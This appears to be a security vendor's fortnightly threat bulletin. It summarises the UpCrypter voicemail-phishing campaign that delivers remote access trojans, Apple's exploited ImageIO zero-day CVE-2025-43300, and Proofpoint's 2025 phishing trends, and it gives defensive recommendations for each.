UpCrypter-Enabled Voicemail Scams Deliver RAT Payloads
In late August 2025, cybersecurity researchers with Fortinet FortiGuard Labs uncovered a sophisticated phishing campaign deploying a loader malware known as UpCrypter. This campaign uses faux voicemail notifications and bogus purchase orders as enticing lures to dupe recipients into downloading hidden malware.
The attack begins with meticulously crafted phishing emails masquerading as either missed voicemail alerts or legitimate purchase order messages. Each contains a link prompting recipients to retrieve a PDF or audio file. Clicking the link directs the user to a deceptive landing page that mimics the target’s branding by fetching and displaying the real domain and logo, enhancing the illusion of legitimacy. Upon engagement, the user downloads a ZIP file. This archive houses an obfuscated JavaScript file—UpCrypter’s initial loader. Before proceeding, the script carefully checks for internet connectivity and scans for debugging tools, forensic utilities, or sandbox environments, thereby evading automated defences.
Once executed, the JavaScript loader connects to an attacker-controlled server to fetch the next-stage payload. A clever twist lies in how the payload is delivered: either as plain text or hidden within seemingly harmless image files through steganography—a technique that conceals data within visual content.
Alternatively, the campaign can distribute UpCrypter as an MSIL (Microsoft Intermediate Language) loader, capable of performing deep anti-analysis and anti‑virtualisation checks. Once launched, it pulls down a trio of malicious components—a PowerShell script, a DLL, and the main payload—and combines them during execution in memory. If triggered successfully, the loader delivers a suite of Remote Access Trojans (RATs), such as PureHVNC, DCRat (DarkCrystal RAT), or Babylon RAT—all granting the attacker full control over the infected machine.
From early August 2025, the UpCrypter campaign has hit organisations across manufacturing, technology, construction, healthcare, and hospitality. Victims have been reported in Austria, Belarus, Canada, Egypt, India, and Pakistan, highlighting its broad geographic and sectoral reach. Check Point recently exposed a large-scale phishing scheme leveraging Google Classroom infrastructure, sending over 115,000 emails to 13,500 organisations between 6–12 August 2025. These emails contained fake commercial offers and redirected victims to WhatsApp-based scam channels. By abusing the Google Classroom infrastructure, attackers bypassed standard email authentication safeguards (SPF, DKIM, DMARC), significantly increasing their success rate.
The UpCrypter campaign demonstrates how phishing attacks are becoming increasingly sophisticated and evasive. By combining authentic-looking lures, domain-based impersonation, multi-stage payload delivery, and stealthy execution techniques, attackers are achieving high success rates while leaving minimal forensic evidence.
References:
Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads
Phishing Campaign Targeting Companies via UpCrypter | FortiGuard Labs
Apple ImageIO Zero-Day: A Picture-Perfect Exploit
Threat Level: Critical
Impact: Remote code execution, device compromise, espionage potential
Platforms: iOS, iPadOS, macOS
First reported: August 2025
Sources: Apple Security Updates
A Picture Worth a Thousand Exploits
Apple’s carefully cultivated security image just took another hit. The company has issued emergency updates for CVE-2025-43300, a critical flaw in the ImageIO framework. It allows attackers to weaponise seemingly harmless image files. View, preview, or even just receive one – and an attacker could gain remote code execution on your device.
Apple admitted the vulnerability is already being exploited in the wild. That’s never good news, and it usually signals a well-resourced adversary using the flaw in highly targeted campaigns rather than mass spam runs. Think surveillance, corporate espionage, or government-grade spyware.
Technical Aspects
At its core, CVE-2025-43300 is an out-of-bounds write in ImageIO, Apple’s ubiquitous image parsing framework. The bug is triggered by maliciously crafted image metadata. When ImageIO mismanages that data, memory corruption occurs, letting attackers overwrite adjacent memory and inject code.
Because ImageIO isn’t confined to one app, the attack surface is huge. The framework powers image rendering in iMessage, Safari, Mail, and countless third-party apps. That means no sketchy sideloading or user interaction is required. In many cases, the exploit fires the moment the OS generates a thumbnail or preview.
Once successful, the exploit gives attackers the ability to execute arbitrary code at the application privilege level. From there, they can deploy spyware, lift credentials, or establish deeper persistence. While Apple kept the technical detail sparse, the disclosure that it is being exploited confirms the bug has been stabilised into a reliable weapon.
Current Threat Landscape
This isn’t Apple’s first scramble this year. Several WebKit and kernel zero-days have already been patched, and the pattern is clear: attackers are deliberately targeting low-interaction vectors like images, fonts, and web content. They know these are the daily “background” functions that users rarely think about but that every device processes constantly.
Zero-click or near-zero-click exploits are prized in the surveillance market. They’re quiet, effective, and hard for victims to detect. High-value targets — executives, journalists, diplomats, or engineers working on sensitive projects — are the most likely recipients. And once compromised, a single personal iPhone or Mac can open doors to corporate accounts, VPNs, and sensitive communications.
Business Impact
The risks here aren’t confined to personal devices. Employees increasingly use iPhones, iPads, and Macs for corporate email, authentication apps, and remote access. A single compromised handset can quickly escalate into business compromise, exposing cloud accounts, sensitive data, or even administrative access. Because this zero-day is already being exploited, the threat is operational, not hypothetical. Beyond technical damage, there’s a reputational and legal dimension — few things damage trust faster than customer or partner data leaking through a compromised executive’s phone.
Defensive Requirements
The immediate step is simple: patch everything now. Deploy iOS 18.6.2, iPadOS 18.6.2, and macOS Ventura 13.7.8 / Sonoma 14.7.8 / Sequoia 15.6.1 across managed fleets and enforce patch compliance on BYOD.
Beyond that:
- Awareness: Drive home that malicious content isn’t always an attachment or link. Even an image can be toxic.
- MDM enforcement: Ensure updates are applied and old OS versions are barred from corporate access.
- Segmentation: Treat mobile and personal devices as less trusted by default, limiting direct access into sensitive internal systems.
- Monitoring: Hunt for unusual logins from Apple devices, especially post-patch, when attackers may accelerate use of unpatched exploits.
Bottom Line
A single image shouldn’t be enough to compromise a modern device – but in 2025, that’s where we are. CVE-2025-43300 is a reminder that Apple’s walled garden is far from impenetrable. For defenders, the message is blunt: patch fast, monitor mobile endpoints, and don’t assume a polished Apple logo equals safety. The attackers are already inside the frame.
References:
Apple fixes new zero-day flaw exploited in targeted attacks
Apple security releases – Apple Support
Phishing 2025: Weaponising Human Behaviour
Threat Level: High
Impact: Credential theft, account takeover, ransomware staging
Platforms: Email, SMS, collaboration apps, SaaS platforms
Source: Proofpoint Human Factor Vol. 2 (2025)
A Click Away from Compromise
Phishing has never been this insidious. Proofpoint’s Human Factor 2025: Phishing and URL-Based Threats report makes one thing clear: the era of attachments as the main delivery vector is over. Today, malicious URLs dominate – blending technical trickery with psychological manipulation to devastating effect.
Report Highlights
- URLs now outnumber attachments 4:1 in phishing campaigns.
- Proofpoint recorded 3.7 billion URL-based threats in six months, with credential theft dominating.
- ClickFix campaigns surged nearly 400%, using fake CAPTCHAs and prompts to trick users into running code.
- Around 34% of URL campaigns deployed Remote Monitoring & Management (RMM) tools, abused for persistence and lateral movement.
- Smishing threats exploded — a 2,534% increase in SMS-delivered URLs, often tied to fake tolls or delivery scams.
- QR code phishing is now mainstream, with 4.2 million threats detected in early 2025.
Off-the-shelf phish kits like CoGUI and Darcula are fuelling the rise, enabling even low-skilled actors to run professional-grade phishing operations that bypass MFA and target victims by region.
Current Threat Landscape
Attackers are spreading out across every platform where links can be shared: Teams chats, LinkedIn messages, PDFs, and QR codes. Many look indistinguishable from legitimate services, making them harder for both users and filters to catch.
The endgame is often broader than one quick hit. Credentials fuel follow-on attacks, RMM tools provide stealthy persistence, and the groundwork is laid for ransomware or fraud. In this model, people themselves – not systems – are the primary entry point.
Business Impact
The fallout from these campaigns can be wide-ranging. A stolen password might trigger account takeover, leading to data theft, financial fraud, or ransomware. RMM abuse makes intrusions harder to evict and increases downtime when attackers strike. The rapid rise of smishing and QR threats creates new pathways for criminals to reach staff and customers directly. Financial loss is the obvious outcome, but reputational damage is just as serious when compromised accounts are used to target partners or suppliers, eroding trust at exactly the wrong time.
Defensive Requirements
Defending against this wave of phishing demands a layered approach. Start with multi-channel filtering – URLs need to be sandboxed whether they arrive by email, SMS, or chat. Add click-time protection, detonating links before they reach the user.
On endpoints, watch for signs of persistence such as unauthorised RMM installs, suspicious registry edits, or rogue system services. Training is still vital but make it specific: employees should recognise fake delivery notices, road toll scams, and QR codes that appear out of context.
Focus protection where it matters most. Executives, finance teams, and admins – Proofpoint’s “Very Attacked People” – face disproportionate targeting. Give them stronger authentication and closer monitoring so one bad click doesn’t escalate into a crisis.
Bottom Line
This isn’t phishing as we used to know it. Today’s lures are AI-polished, brand-faithful, and designed to slip past both filters and human suspicion. Proofpoint’s data makes it clear: URL-based phishing is the frontline threat in 2025.
If your defences stop at the inbox, you’re already a step behind. The attack surface now spans SMS, collaboration tools, and every platform where someone can be tricked into clicking. Build your defences for that reality – because one careless scan or tap is all it takes to open the door.
References
The Human Factor 2025 Vol. 2: URL Phishing | Proofpoint US
Get Norm’s threat bulletin direct to your inbox
Norm tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.
You can receive this bulletin for free, every fortnight, by entering your business email address below:
